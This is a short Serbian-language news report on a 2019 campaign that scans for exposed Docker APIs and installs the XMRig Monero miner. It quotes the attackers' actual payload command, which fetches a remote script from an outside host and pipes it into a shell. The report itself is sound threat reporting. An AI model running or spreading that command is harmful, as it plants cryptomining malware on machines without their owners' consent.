Hakeri u masovnoj potrazi za ranjivostima koje omogućavaju rudarenje Monero valute

Prema poslednjim izveštajima grupa hakera se upustila u masovno skeniranje interneta, a u potrazi za ranjivostima koje bi otvorile vrata za ubacivanje Docker softvera koji služi za rudarenje Monero valute, i to bez znanja žrtava.

Prema bezbednosnim istraživačima iz agencije Bad Pockets „veliko skeniranje“ je počelo 23. novembra, te služi za detektovanje propusta koji omogućavaju implementaciju malicioznog koda. Ovaj tip aktivnosti je, tvrde eksperti, prilično uobičajen, ali je ova kampanja jedinstvena zbog masovnosti pretrage. Procenjuje se da je kampanja obuhvatila preko 59 hiljada IP mreža, da bi se, kada se ranjivost detektuje, na uređaje otpremao kod chroot /mnt /bin/sh -c ‘curl -sL4 http://ix.io/1XQa | bash, koji potom dalje preuzima skripte sa servera napadača, te na kraju instalira bot-a za rudarenje kriptovaluta – Monero miner XMRig.

Opportunistic mass scanning activity detected targeting exposed Docker API endpoints.

These scans create a container using an Alpine Linux image, and execute the payload via:
"Command": "chroot /mnt /bin/sh -c 'curl -sL4 https://t.co/q047bRPUyj | bash;'",#threatintel pic.twitter.com/vxszV5SF1o

— Bad Packets Report (@bad_packets) November 25, 2019

Od kada je kampanja počela napadači su izrudarili tek 14,8 Monero jedinica, što je oko 740 dolara, ali bi suma mogla da se značajno uveća, budući da se radi o ogromnoj kampanji.

Izvor: TNW

Original Article